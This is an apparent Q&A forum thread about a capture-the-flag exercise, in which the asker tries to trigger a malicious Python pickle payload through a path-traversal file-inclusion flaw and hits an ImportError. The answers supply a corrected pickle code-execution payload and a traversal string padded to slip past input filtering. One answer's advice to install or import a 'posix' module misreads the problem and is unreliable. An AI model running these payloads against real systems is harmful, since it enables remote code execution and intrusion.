Pickle Shellcode Import Error

Question

I'm trying to execute pickle shell-code through a download function on a website but I get the following error:

<html> <h1>ERROR: Cannot load file</h1> <!-- Traceback (most recent call last): File "/opt/example/handlers/UserHandlers.py", line 134, in get upload = pickle.load(f) File "/usr/local/lib/python2.7/pickle.py", line 1384, in load return Unpickler(file).load() File "/usr/local/lib/python2.7/pickle.py", line 864, in load dispatch[key](self) File "/usr/local/lib/python2.7/pickle.py", line 1096, in load_global klass = self.find_class(module, name) File "/usr/local/lib/python2.7/pickle.py", line 1130, in find_class __import__(module) ImportError: No module named posix --> </html> 

Pickle Shellcode:

cposix system p1 (S'sleep 30' p2 tRp3 

I assume this is a path issue and I also can't import modules by filename. Keep in mind I'm using an LFI vulnerability to call my pickle shell-code.

Example: http://example.com/download?file=../../../pickle.txt

Could this be the cause of the issue? I should also note this is a CTF, so it should be vulnerable in one way or another. Thanks in advance!

Answer 1

ImportError: No module named posix 

Is the problem here. You can either attempt to drop to a bash shell and use

pip install posix 

Or the best solution is to just remove

import posix 

and replace it with

import os 

Answer 2

Your shell code needs to look like so according to https://cvedetails.com/cve/CVE-2013-5093/

cposix\nsystem\np1\n(S'sleep 30'\np2\ntRp3.

Also try padding your directory traversal attack with additional characters to account for input sanitation.

http://example.com/download?file=....//....//....//pickle.txt